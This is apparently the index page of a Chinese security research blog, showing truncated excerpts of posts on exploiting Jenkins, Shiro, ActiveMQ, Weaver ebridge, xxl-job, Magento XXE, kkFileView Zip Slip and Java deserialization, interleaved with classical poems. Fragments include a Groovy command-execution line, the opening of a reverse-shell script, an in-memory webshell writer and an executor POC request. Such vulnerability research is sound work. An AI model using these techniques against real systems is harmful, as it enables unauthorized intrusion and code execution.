Bmth's blog

挺有意思的一道题，看了官方wp才发现其实不难，但做的时候完全想不到，很巧妙的漏洞结合 提示： install.php mt_rand的安全问题 下载最新版本安装包：https://gitee.com/snowsun/emlog/releases/download/pro-2.5.4/emlog_pro_2.5.4.zip mt_rand伪随机数在给出第二个提示的时候才反应过来是伪随机数的问题，根据mt_rand定位到include/lib/common.php 1234567891011121314151617function getRandStr($length = 12, $special_chars = true, $numeric_only = false){ if ($numeric_only) { $chars = '0123456789'; } else { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN ...

通过Jenkins 的弱口令->从而进入控制台RCE->实现内存马 这里环境就使用p神的vulhub了：https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897 版本：Jenkins Version 2.441管理员用户：admin/vulhub 历史漏洞就没什么好讲的了查看版本信息：http://IP:8080/whoAmI/ 也可以从header头x-jenkins中获取版本 后渗透假如有幸进入后台，我们可以在Manage Jenkins -> Script Console执行 Groovy 脚本 Groovy控制台命令执行： 1println "whoami".execute().text 反弹shell，纯依赖Groovy即可：https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 123456789101112131415161718String host="localhost"; ...

林花谢了春红，太匆匆。无奈朝来寒雨晚来风。胭脂泪，相留醉，几时重。自是人生长恨水长东。 总结一下技巧吧，师傅们太猛了，浅浅搬个砖 相遇首先看到pen4uin师傅的文章：记一次 Shiro 的实战利用利用到的是文件落地+追加的方式，也是最基础的一种 简单演示一遍首先使用JMG生成Tomcat内存马，输出格式为BASE64 将结果放入[payload]中，限制每组长度为1000 1234567891011121314151617181920212223242526272829303132import javassist.ClassPool;import javassist.CtClass;public class WriteFile { public static void main(String[] args) throws Exception{ String base64 = [payload]; int groupSize = 1000; int length = base64.length(); i ...

最近看到一个不出网的技巧，学习一下 影响版本： Apache ActiveMQ 5.18.0 before 5.18.3 Apache ActiveMQ 5.17.0 before 5.17.6 Apache ActiveMQ 5.16.0 before 5.16.7 Apache ActiveMQ before 5.15.16 环境搭建：https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2023-46604 默认端口 默认条件 8161 web 需配置才可远程访问 61616 tcp 远程访问 漏洞出现在61616端口中 源码下载：https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.17.3/activemq-parent-5.17.3-source-release.zip&action=download 漏洞触发点在org.apache.activemq.openwire.v12.BaseDataStreamMarshall ...

谁翻乐府凄凉曲？风也萧萧，雨也萧萧，瘦尽灯花又一宵。不知何事萦怀抱，醒也无聊，醉也无聊，梦也何曾到谢桥。 环境搭建官方：https://wx.weaver.com.cn/download下载：https://wxdownload.e-cology.com.cn/ebridge/ebridge_install_win64_server2008R2_20200819.zip 根据日志可以下载到 2023-08-21 补丁：https://wxdownload.e-cology.com.cn/ebridge/ebridge_patch_20230821.zip 1、右键点击 install64.bat 以管理员身份运行进行程序安装2、安装完成之后 访问http://服务器IP:80883、登陆系统 sysadmin/1 漏洞分析addResume文件上传看到weaver.weixin.app.recruit.controller.ResumeController#addResume 调用 getWxBaseFile 方法进行文件上传weaver.weixi ...

我是清都山水郎。天教分付与疏狂。曾批给雨支风券，累上留云借月章。诗万首，酒千觞。几曾著眼看侯王。玉楼金阙慵归去，且插梅花醉洛阳。 前言在做渗透测试的时候，发现开放了两个端口，一个是404界面 一个显示报错 1{"code":500,"msg":"invalid request, HttpMethod not support."} 经过同事提醒，才发现原来是经典的xxl-job，这个时候可以访问/xxl-job-admin/尝试弱口令登录，也可以尝试未授权或者默认 accessToken 打 Executor 执行器 POC： 12345678910111213141516171819202122232425POST /run HTTP/1.1Host: 127.0.0.1:9999Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...

最近看到一个XXE漏洞，CVSS给了9.8的高分，这就不得不分析一下了：https://github.com/advisories/GHSA-m8cj-3v68-3cxj 影响版本： 1234567= 2.4.4>= 2.4.6-p1, < 2.4.6-p6>= 2.4.5-p1, < 2.4.5-p8< 2.4.4-p9= 2.4.5= 2.4.6= 2.4.7 环境搭建漏洞复现啥的都还好说，环境是真麻烦 推荐使用：https://github.com/markshust/docker-magento/ 123456# Create your project directory then go into it:mkdir -p ~/Sites/magentocd $_# Run this automated one-liner from the directory you want to install your project.curl -s https://raw.githubusercontent.com/markshust/docker-mag ...

余操业之时，常有小程序&APP渗透，遂小作一文，以记之 mumu模拟器->永遠の神だ 抓包The source of all things Method onechose this root need Download burp certificate：http://127.0.0.1:8080/cert Convert certificate to pem format，get md5 12openssl x509 -inform DER -in cacert.der -out cacert.pemopenssl x509 -inform PEM -subject_hash_old -in cacert.pem Change the certificate filename to 9a5ba575.0 Copy the certificate to /system/etc/security/cacerts/(MT管理器 is a good tool) Modify permissions Finally，just add an agent that will do ...

黄金榜上，偶失龙头望。明代暂遗贤，如何向。未遂风云便，争不恣狂荡。何须论得丧？才子词人，自是白衣卿相。烟花巷陌，依约丹青屏障。幸有意中人，堪寻访。且恁偎红倚翠，风流事、平生畅。青春都一饷。忍把浮名，换了浅斟低唱！ Zip Slip漏洞还是很经典的，但没咋接触过，记录一下，Java Zip Slip漏洞案例分析及实战挖掘 环境搭建123wget https://kkview.cn/resource/kkFileView-4.3.0-docker.tardocker load -i kkFileView-4.3.0-docker.tardocker run -it -p 8012:8012 keking/kkfileview:4.3.0 后续可以把jar拉出来，然后动调 1java -Dfile.encoding=UTF-8 -Dspring.config.location=../config/application.properties -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar k ...

他时若遂凌云志，敢笑黄巢不丈夫！ 学到了，学废了，Orz 原生反序列化先来看看 toString 的新链 javax.swing.event.EventListenerList#readObject 调用add方法 Automatic Call of toString()：初次看的时候，发现并没有toString的调用啊，疑惑？其实巧妙的是，在 Object 进行拼接的时候会自动触发该对象的toString方法（很基础的点，但很容易遗漏） 接下来看看是否可控，很明显是EventListener l = (EventListener)s.readObject(); 1234567891011121314151617// Serialization support.private void writeObject(ObjectOutputStream s) throws IOException { Object[] lList = listenerList; s.defaultWriteObject(); // Save the non-null event ...